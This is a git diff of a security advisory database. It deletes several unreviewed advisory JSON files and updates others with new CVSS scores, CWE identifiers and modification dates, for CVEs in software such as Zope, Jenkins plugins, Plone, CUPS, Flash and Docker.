b/advisories/unreviewed/2022/05/GHSA-qh4q-fwf8-qqrw/GHSA-qh4q-fwf8-qqrw.json deleted file mode 100644 index 800701e06641c..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-qh4q-fwf8-qqrw/GHSA-qh4q-fwf8-qqrw.json +++ /dev/null @@ -1,55 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-qh4q-fwf8-qqrw", - "modified": "2022-05-17T05:48:31Z", - "published": "2022-05-17T05:48:31Z", - "aliases": [ - "CVE-2010-3198" - ], - "details": "ZServer in Zope 2.10.x before 2.10.12 and 2.11.x before 2.11.7 allows remote attackers to cause a denial of service (crash of worker threads) via vectors that trigger uncaught exceptions.", - "severity": [ - - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2010-3198" - }, - { - "type": "WEB", - "url": "https://bugs.launchpad.net/zope2/+bug/627988" - }, - { - "type": "WEB", - "url": "https://mail.zope.org/pipermail/zope-announce/2010-September/002247.html" - }, - { - "type": "WEB", - "url": "http://www.securityfocus.com/bid/42939" - }, - { - "type": "WEB", - "url": "http://www.vupen.com/english/advisories/2010/2275" - }, - { - "type": "WEB", - "url": "http://www.zope.org/Products/Zope/2.10.12/CHANGES.txt" - }, - { - "type": "WEB", - "url": "http://www.zope.org/Products/Zope/2.11.7/CHANGES.txt" - } - ], - "database_specific": { - "cwe_ids": [ - - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2010-09-08T20:00:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-qj27-w92h-fc9r/GHSA-qj27-w92h-fc9r.json b/advisories/unreviewed/2022/05/GHSA-qj27-w92h-fc9r/GHSA-qj27-w92h-fc9r.json deleted file mode 100644 index 51080041677be..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-qj27-w92h-fc9r/GHSA-qj27-w92h-fc9r.json +++ /dev/null @@ -1,39 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-qj27-w92h-fc9r", - "modified": "2022-05-24T17:06:12Z", - "published": "2022-05-24T17:06:12Z", - "aliases": [ - "CVE-2015-1809" - ], - "details": "XML external entity (XXE) vulnerability in CloudBees Jenkins before 1.600 and LTS before 1.596.1 allows remote attackers to read arbitrary XML files via an XPath query.", - "severity": [ - - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2015-1809" - }, - { - "type": "WEB", - "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1205625" - }, - { - "type": "WEB", - "url": "https://jenkins.io/security/advisory/2015-02-27/" - } - ], - "database_specific": { - "cwe_ids": [ - - ], - "severity": null, - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2020-01-15T19:15:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-qj7x-wm9q-qjx8/GHSA-qj7x-wm9q-qjx8.json b/advisories/unreviewed/2022/05/GHSA-qj7x-wm9q-qjx8/GHSA-qj7x-wm9q-qjx8.json deleted file mode 100644 index 9a55c1fc9c331..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-qj7x-wm9q-qjx8/GHSA-qj7x-wm9q-qjx8.json +++ /dev/null @@ -1,43 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-qj7x-wm9q-qjx8", - "modified": "2022-05-17T05:50:05Z", - "published": "2022-05-17T05:50:05Z", - "aliases": [ - "CVE-2010-2422" - ], - "details": "Cross-site scripting (XSS) vulnerability in PortalTransforms in Plone 2.1 through 3.3.4 before hotfix 20100612 allows remote attackers to inject arbitrary web script or HTML via the safe_html transform.", - "severity": [ - - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2010-2422" - }, - { - "type": "WEB", - "url": "http://plone.org/products/plone/security/advisories/cve-2010-unassigned-html-injection-in-safe_html" - }, - { - "type": "WEB", - "url": "http://secunia.com/advisories/40270" - }, - { - "type": "WEB", - "url": "http://www.securityfocus.com/bid/40999" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-79" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2010-06-24T12:17:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-qj88-9fvw-xw2m/GHSA-qj88-9fvw-xw2m.json b/advisories/unreviewed/2022/05/GHSA-qj88-9fvw-xw2m/GHSA-qj88-9fvw-xw2m.json index 9094936656554..20eb855b4707a 100644 --- a/advisories/unreviewed/2022/05/GHSA-qj88-9fvw-xw2m/GHSA-qj88-9fvw-xw2m.json +++ b/advisories/unreviewed/2022/05/GHSA-qj88-9fvw-xw2m/GHSA-qj88-9fvw-xw2m.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-qj88-9fvw-xw2m", - "modified": "2022-05-01T02:00:59Z", + "modified": "2024-02-08T21:30:30Z", "published": "2022-05-01T02:00:59Z", "aliases": [ "CVE-2005-1674" ], "details": "Cross-Site Request Forgery (CSRF) vulnerability in Help Center Live allows remote attackers to perform actions as the administrator via a link or IMG tag to view.php.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N" + } ], "affected": [ @@ -29,7 +32,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-352" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/05/GHSA-qj8g-gjw2-qf5r/GHSA-qj8g-gjw2-qf5r.json b/advisories/unreviewed/2022/05/GHSA-qj8g-gjw2-qf5r/GHSA-qj8g-gjw2-qf5r.json index 9ea1b3922d831..8194ccd5cc2a8 100644 --- a/advisories/unreviewed/2022/05/GHSA-qj8g-gjw2-qf5r/GHSA-qj8g-gjw2-qf5r.json +++ b/advisories/unreviewed/2022/05/GHSA-qj8g-gjw2-qf5r/GHSA-qj8g-gjw2-qf5r.json @@ -37,7 +37,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-119" + "CWE-119", + "CWE-120" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/05/GHSA-qmvx-xrr5-64fm/GHSA-qmvx-xrr5-64fm.json b/advisories/unreviewed/2022/05/GHSA-qmvx-xrr5-64fm/GHSA-qmvx-xrr5-64fm.json index 6443b7cf460a4..01dcc73b174e4 100644 --- a/advisories/unreviewed/2022/05/GHSA-qmvx-xrr5-64fm/GHSA-qmvx-xrr5-64fm.json +++ b/advisories/unreviewed/2022/05/GHSA-qmvx-xrr5-64fm/GHSA-qmvx-xrr5-64fm.json @@ -33,7 +33,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-79" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/05/GHSA-qrh2-mh97-pw8p/GHSA-qrh2-mh97-pw8p.json b/advisories/unreviewed/2022/05/GHSA-qrh2-mh97-pw8p/GHSA-qrh2-mh97-pw8p.json deleted file mode 100644 index c5bce3bfa919c..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-qrh2-mh97-pw8p/GHSA-qrh2-mh97-pw8p.json +++ /dev/null @@ -1,46 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-qrh2-mh97-pw8p", - "modified": "2022-05-13T01:25:43Z", - "published": "2022-05-13T01:25:43Z", - "aliases": [ - "CVE-2019-1003076" - ], - "details": "A cross-site request forgery vulnerability in Jenkins Audit to Database Plugin in the DbAuditPublisherDescriptorImpl#doTestJdbcConnection form validation method allows attackers to initiate a connection to an attacker-specified server.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-1003076" - }, - { - "type": "WEB", - "url": "https://jenkins.io/security/advisory/2019-04-03/#SECURITY-977" - }, - { - "type": "WEB", - "url": "http://www.openwall.com/lists/oss-security/2019/04/12/2" - }, - { - "type": "WEB", - "url": "http://www.securityfocus.com/bid/107790" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-352" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2019-04-04T16:29:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-qvh7-j2x6-25x5/GHSA-qvh7-j2x6-25x5.json b/advisories/unreviewed/2022/05/GHSA-qvh7-j2x6-25x5/GHSA-qvh7-j2x6-25x5.json index b3accd1da5000..dacd10984eb36 100644 --- a/advisories/unreviewed/2022/05/GHSA-qvh7-j2x6-25x5/GHSA-qvh7-j2x6-25x5.json +++ b/advisories/unreviewed/2022/05/GHSA-qvh7-j2x6-25x5/GHSA-qvh7-j2x6-25x5.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-qvh7-j2x6-25x5", - "modified": "2022-05-02T03:46:20Z", + "modified": "2024-02-02T18:30:21Z", "published": "2022-05-02T03:46:20Z", "aliases": [ "CVE-2009-3553" ], "details": "Use-after-free vulnerability in the abstract file-descriptor handling interface in the cupsdDoSelect function in scheduler/select.c in the scheduler in cupsd in CUPS 1.3.7 and 1.3.10 allows remote attackers to cause a denial of service (daemon crash or hang) via a client disconnection during listing of a large number of print jobs, related to improperly maintaining a reference count. NOTE: some of these details are obtained from third party information.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } ], "affected": [ @@ -117,7 +120,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-416" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/05/GHSA-r2g9-49rq-6p4c/GHSA-r2g9-49rq-6p4c.json b/advisories/unreviewed/2022/05/GHSA-r2g9-49rq-6p4c/GHSA-r2g9-49rq-6p4c.json index a52faeabe1293..a099e336f1e07 100644 --- a/advisories/unreviewed/2022/05/GHSA-r2g9-49rq-6p4c/GHSA-r2g9-49rq-6p4c.json +++ b/advisories/unreviewed/2022/05/GHSA-r2g9-49rq-6p4c/GHSA-r2g9-49rq-6p4c.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-r2g9-49rq-6p4c", - "modified": "2022-05-01T02:05:39Z", + "modified": "2024-02-08T21:30:31Z", "published": "2022-05-01T02:05:39Z", "aliases": [ "CVE-2005-2181" ], "details": "Cisco 7940/7960 Voice over IP (VoIP) phones do not properly check the Call-ID, branch, and tag values in a NOTIFY message to verify a subscription, which allows remote attackers to spoof messages such as the \"Messages waiting\" message.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" + } ], "affected": [ @@ -37,7 +40,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-347" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/05/GHSA-r5c7-qcc9-5v7m/GHSA-r5c7-qcc9-5v7m.json b/advisories/unreviewed/2022/05/GHSA-r5c7-qcc9-5v7m/GHSA-r5c7-qcc9-5v7m.json deleted file mode 100644 index 51b9d78b61e22..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-r5c7-qcc9-5v7m/GHSA-r5c7-qcc9-5v7m.json +++ /dev/null @@ -1,42 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-r5c7-qcc9-5v7m", - "modified": "2022-05-13T01:36:51Z", - "published": "2022-05-13T01:36:51Z", - "aliases": [ - "CVE-2017-2650" - ], - "details": "It was found that the use of Pipeline: Classpath Step Jenkins plugin enables a bypass of the Script Security sandbox for users with SCM commit access, as well as users with e.g. Job/Configure permission in Jenkins.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-2650" - }, - { - "type": "WEB", - "url": "https://jenkins.io/security/advisory/2017-03-20/" - }, - { - "type": "WEB", - "url": "http://www.securityfocus.com/bid/96981" - } - ], - "database_specific": { - "cwe_ids": [ - - ], - "severity": "HIGH", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2018-07-27T20:29:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-r5jr-82x4-r6j7/GHSA-r5jr-82x4-r6j7.json b/advisories/unreviewed/2022/05/GHSA-r5jr-82x4-r6j7/GHSA-r5jr-82x4-r6j7.json deleted file mode 100644 index b69266942dd3f..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-r5jr-82x4-r6j7/GHSA-r5jr-82x4-r6j7.json +++ /dev/null @@ -1,46 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-r5jr-82x4-r6j7", - "modified": "2022-05-13T01:25:16Z", - "published": "2022-05-13T01:25:16Z", - "aliases": [ - "CVE-2019-1003097" - ], - "details": "Jenkins Crowd Integration Plugin stores credentials unencrypted in the global config.xml configuration file on the Jenkins master where they can be viewed by users with access to the master file system.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-1003097" - }, - { - "type": "WEB", - "url": "https://jenkins.io/security/advisory/2019-04-03/#SECURITY-1069" - }, - { - "type": "WEB", - "url": "http://www.openwall.com/lists/oss-security/2019/04/12/2" - }, - { - "type": "WEB", - "url": "http://www.securityfocus.com/bid/107790" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-522" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2019-04-04T16:29:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-r859-p3hv-36hf/GHSA-r859-p3hv-36hf.json b/advisories/unreviewed/2022/05/GHSA-r859-p3hv-36hf/GHSA-r859-p3hv-36hf.json index 7b2ca4147fc4f..01ecc99186d3e 100644 --- a/advisories/unreviewed/2022/05/GHSA-r859-p3hv-36hf/GHSA-r859-p3hv-36hf.json +++ b/advisories/unreviewed/2022/05/GHSA-r859-p3hv-36hf/GHSA-r859-p3hv-36hf.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-r859-p3hv-36hf", - "modified": "2022-05-02T06:12:17Z", + "modified": "2024-02-03T03:30:26Z", "published": "2022-05-02T06:12:17Z", "aliases": [ "CVE-2010-0378" ], "details": "Use-after-free vulnerability in Adobe Flash Player 6.0.79, as distributed in Microsoft Windows XP SP2 and SP3, allows remote attackers to execute arbitrary code by unloading a Flash object that is currently being accessed by a script, leading to memory corruption, aka a \"Movie Unloading Vulnerability.\"", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -45,7 +48,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-416" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/05/GHSA-r9vw-px66-gx7g/GHSA-r9vw-px66-gx7g.json b/advisories/unreviewed/2022/05/GHSA-r9vw-px66-gx7g/GHSA-r9vw-px66-gx7g.json index ac00f0ec36c1f..22c6ae70d5e2d 100644 --- a/advisories/unreviewed/2022/05/GHSA-r9vw-px66-gx7g/GHSA-r9vw-px66-gx7g.json +++ b/advisories/unreviewed/2022/05/GHSA-r9vw-px66-gx7g/GHSA-r9vw-px66-gx7g.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-r9vw-px66-gx7g", - "modified": "2022-05-01T02:01:33Z", + "modified": "2024-02-08T21:30:31Z", "published": "2022-05-01T02:01:33Z", "aliases": [ "CVE-2005-1744" ], "details": "BEA WebLogic Server and WebLogic Express 7.0 through Service Pack 5 does not log out users when an application is redeployed, which allows those users to continue to access the application without having to log in again, which may be in violation of newly changed security constraints or role mappings.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -41,7 +44,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-459" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/05/GHSA-rcrv-6r7r-rr7m/GHSA-rcrv-6r7r-rr7m.json b/advisories/unreviewed/2022/05/GHSA-rcrv-6r7r-rr7m/GHSA-rcrv-6r7r-rr7m.json deleted file mode 100644 index 8ed4175b77f22..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-rcrv-6r7r-rr7m/GHSA-rcrv-6r7r-rr7m.json +++ /dev/null @@ -1,46 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-rcrv-6r7r-rr7m", - "modified": "2022-05-13T01:17:45Z", - "published": "2022-05-13T01:17:45Z", - "aliases": [ - "CVE-2019-1003059" - ], - "details": "A missing permission check in Jenkins FTP publisher Plugin in the FTPPublisher.DescriptorImpl#doLoginCheck method allows attackers with Overall/Read permission to initiate a connection to an attacker-specified server.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-1003059" - }, - { - "type": "WEB", - "url": "https://jenkins.io/security/advisory/2019-04-03/#SECURITY-974" - }, - { - "type": "WEB", - "url": "http://www.openwall.com/lists/oss-security/2019/04/12/2" - }, - { - "type": "WEB", - "url": "http://www.securityfocus.com/bid/107790" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-862" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2019-04-04T16:29:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-rfj9-gw43-8w26/GHSA-rfj9-gw43-8w26.json b/advisories/unreviewed/2022/05/GHSA-rfj9-gw43-8w26/GHSA-rfj9-gw43-8w26.json index 2970bf1ac5fa4..5c3eca3a9da71 100644 --- a/advisories/unreviewed/2022/05/GHSA-rfj9-gw43-8w26/GHSA-rfj9-gw43-8w26.json +++ b/advisories/unreviewed/2022/05/GHSA-rfj9-gw43-8w26/GHSA-rfj9-gw43-8w26.json @@ -29,7 +29,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-770" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/05/GHSA-rpcf-xw9j-7c7j/GHSA-rpcf-xw9j-7c7j.json b/advisories/unreviewed/2022/05/GHSA-rpcf-xw9j-7c7j/GHSA-rpcf-xw9j-7c7j.json index c70adf20e56f1..3a72edc466bd1 100644 --- a/advisories/unreviewed/2022/05/GHSA-rpcf-xw9j-7c7j/GHSA-rpcf-xw9j-7c7j.json +++ b/advisories/unreviewed/2022/05/GHSA-rpcf-xw9j-7c7j/GHSA-rpcf-xw9j-7c7j.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-rpcf-xw9j-7c7j", - "modified": "2022-05-17T01:59:37Z", + "modified": "2024-02-02T15:30:27Z", "published": "2022-05-17T01:59:37Z", "aliases": [ "CVE-2011-1755" ], "details": "jabberd2 before 2.2.14 does not properly detect recursion during entity expansion, which allows remote attackers to cause a denial of service (memory and CPU consumption) via a crafted XML document containing a large number of nested entity references, a similar issue to CVE-2003-1564.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } ], "affected": [ @@ -66,6 +69,10 @@ "type": "WEB", "url": "http://support.apple.com/kb/HT5002" }, + { + "type": "WEB", + "url": "http://www.mail-archive.com/jabberd2%40lists.xiaoka.com/msg01655.html" + }, { "type": "WEB", "url": "http://www.mail-archive.com/jabberd2@lists.xiaoka.com/msg01655.html" @@ -85,7 +92,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-776" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/05/GHSA-rv74-mh27-4jpv/GHSA-rv74-mh27-4jpv.json b/advisories/unreviewed/2022/05/GHSA-rv74-mh27-4jpv/GHSA-rv74-mh27-4jpv.json deleted file mode 100644 index 374f91132c597..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-rv74-mh27-4jpv/GHSA-rv74-mh27-4jpv.json +++ /dev/null @@ -1,39 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-rv74-mh27-4jpv", - "modified": "2022-05-24T17:36:09Z", - "published": "2022-05-24T17:36:09Z", - "aliases": [ - "CVE-2020-7790" - ], - "details": "This affects the package spatie/browsershot from 0.0.0. By specifying a URL in the file:// protocol an attacker is able to include arbitrary files in the resultant PDF.", - "severity": [ - - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-7790" - }, - { - "type": "WEB", - "url": "https://github.com/spatie/browsershot/issues/441%23issue-735049731" - }, - { - "type": "WEB", - "url": "https://snyk.io/vuln/SNYK-PHP-SPATIEBROWSERSHOT-1037064" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-22" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2020-12-11T11:15:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-rvgj-fpwg-2m28/GHSA-rvgj-fpwg-2m28.json b/advisories/unreviewed/2022/05/GHSA-rvgj-fpwg-2m28/GHSA-rvgj-fpwg-2m28.json index 83ea552b95c12..d7c98ae951df1 100644 --- a/advisories/unreviewed/2022/05/GHSA-rvgj-fpwg-2m28/GHSA-rvgj-fpwg-2m28.json +++ b/advisories/unreviewed/2022/05/GHSA-rvgj-fpwg-2m28/GHSA-rvgj-fpwg-2m28.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-rvgj-fpwg-2m28", - "modified": "2022-05-01T07:41:49Z", + "modified": "2024-02-08T03:32:44Z", "published": "2022-05-01T07:41:49Z", "aliases": [ "CVE-2006-6811" ], "details": "KsIRC 1.3.12 allows remote attackers to cause a denial of service (crash) via a long PRIVMSG string when connecting to an Internet Relay Chat (IRC) server, which causes an assertion failure and results in a NULL pointer dereference. NOTE: this issue was originally reported as a buffer overflow.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" + } ], "affected": [ @@ -73,7 +76,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-617" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/05/GHSA-rxph-cq38-gm3g/GHSA-rxph-cq38-gm3g.json b/advisories/unreviewed/2022/05/GHSA-rxph-cq38-gm3g/GHSA-rxph-cq38-gm3g.json deleted file mode 100644 index 44b2c1c98f194..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-rxph-cq38-gm3g/GHSA-rxph-cq38-gm3g.json +++ /dev/null @@ -1,42 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-rxph-cq38-gm3g", - "modified": "2023-10-25T18:31:32Z", - "published": "2022-05-24T17:03:48Z", - "aliases": [ - "CVE-2019-16568" - ], - "details": "Jenkins SCTMExecutor Plugin 2.2 and earlier transmits previously configured service credentials in plain text as part of the global configuration, as well as individual jobs' configurations.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-16568" - }, - { - "type": "WEB", - "url": "https://jenkins.io/security/advisory/2019-12-17/#SECURITY-1521" - }, - { - "type": "WEB", - "url": "http://www.openwall.com/lists/oss-security/2019/12/17/1" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-319" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2019-12-17T15:15:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-v2c9-9m8v-8jjm/GHSA-v2c9-9m8v-8jjm.json b/advisories/unreviewed/2022/05/GHSA-v2c9-9m8v-8jjm/GHSA-v2c9-9m8v-8jjm.json deleted file mode 100644 index f9a6d569878c6..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-v2c9-9m8v-8jjm/GHSA-v2c9-9m8v-8jjm.json +++ /dev/null @@ -1,59 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-v2c9-9m8v-8jjm", - "modified": "2022-05-14T02:45:01Z", - "published": "2022-05-14T02:45:01Z", - "aliases": [ - "CVE-2010-1587" - ], - "details": "The Jetty ResourceHandler in Apache ActiveMQ 5.x before 5.3.2 and 5.4.x before 5.4.0 allows remote attackers to read JSP source code via a // (slash slash) initial substring in a URI for (1) admin/index.jsp, (2) admin/queues.jsp, or (3) admin/topics.jsp.", - "severity": [ - - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2010-1587" - }, - { - "type": "WEB", - "url": "https://issues.apache.org/activemq/browse/AMQ-2700" - }, - { - "type": "WEB", - "url": "http://archives.neohapsis.com/archives/fulldisclosure/2010-04/0278.html" - }, - { - "type": "WEB", - "url": "http://secunia.com/advisories/39567" - }, - { - "type": "WEB", - "url": "http://www.osvdb.org/64020" - }, - { - "type": "WEB", - "url": "http://www.securityfocus.com/archive/1/510896/100/0/threaded" - }, - { - "type": "WEB", - "url": "http://www.securityfocus.com/bid/39636" - }, - { - "type": "WEB", - "url": "http://www.vupen.com/english/advisories/2010/0979" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-20" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2010-04-28T22:30:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-v2cv-wwxq-qq97/GHSA-v2cv-wwxq-qq97.json b/advisories/unreviewed/2022/05/GHSA-v2cv-wwxq-qq97/GHSA-v2cv-wwxq-qq97.json deleted file mode 100644 index e447fc97e0b4c..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-v2cv-wwxq-qq97/GHSA-v2cv-wwxq-qq97.json +++ /dev/null @@ -1,59 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-v2cv-wwxq-qq97", - "modified": "2022-05-24T16:51:39Z", - "published": "2022-05-24T16:51:39Z", - "aliases": [ - "CVE-2019-14271" - ], - "details": "In Docker 19.03.x before 19.03.1 linked against the GNU C Library (aka glibc), code injection can occur when the nsswitch facility dynamically loads a library inside a chroot that contains the contents of the container.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-14271" - }, - { - "type": "WEB", - "url": "https://github.com/moby/moby/issues/39449" - }, - { - "type": "WEB", - "url": "https://docs.docker.com/engine/release-notes/" - }, - { - "type": "WEB", - "url": "https://seclists.org/bugtraq/2019/Sep/21" - }, - { - "type": "WEB", - "url": "https://security.netapp.com/advisory/ntap-20190828-0003/" - }, - { - "type": "WEB", - "url": "https://www.debian.org/security/2019/dsa-4521" - }, - { - "type": "WEB", - "url": "http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00084.html" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-665", - "CWE-94" - ], - "severity": "CRITICAL", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2019-07-29T18:15:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-vc2v-34c4-vg9c/GHSA-vc2v-34c4-vg9c.json b/advisories/unreviewed/2022/05/GHSA-vc2v-34c4-vg9c/GHSA-vc2v-34c4-vg9c.json deleted file mode 100644 index 03a3218f0cebe..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-vc2v-34c4-vg9c/GHSA-vc2v-34c4-vg9c.json +++ /dev/null @@ -1,46 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-vc2v-34c4-vg9c", - "modified": "2022-05-13T01:17:42Z", - "published": "2022-05-13T01:17:42Z", - "aliases": [ - "CVE-2019-1003088" - ], - "details": "Jenkins Fabric Beta Publisher Plugin stores credentials unencrypted in job config.xml files on the Jenkins master where they can be viewed by users with Extended Read permission, or access to the master file system.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-1003088" - }, - { - "type": "WEB", - "url": "https://jenkins.io/security/advisory/2019-04-03/#SECURITY-1043" - }, - { - "type": "WEB", - "url": "http://www.openwall.com/lists/oss-security/2019/04/12/2" - }, - { - "type": "WEB", - "url": "http://www.securityfocus.com/bid/107790" - } - ], - "database_specific": { - 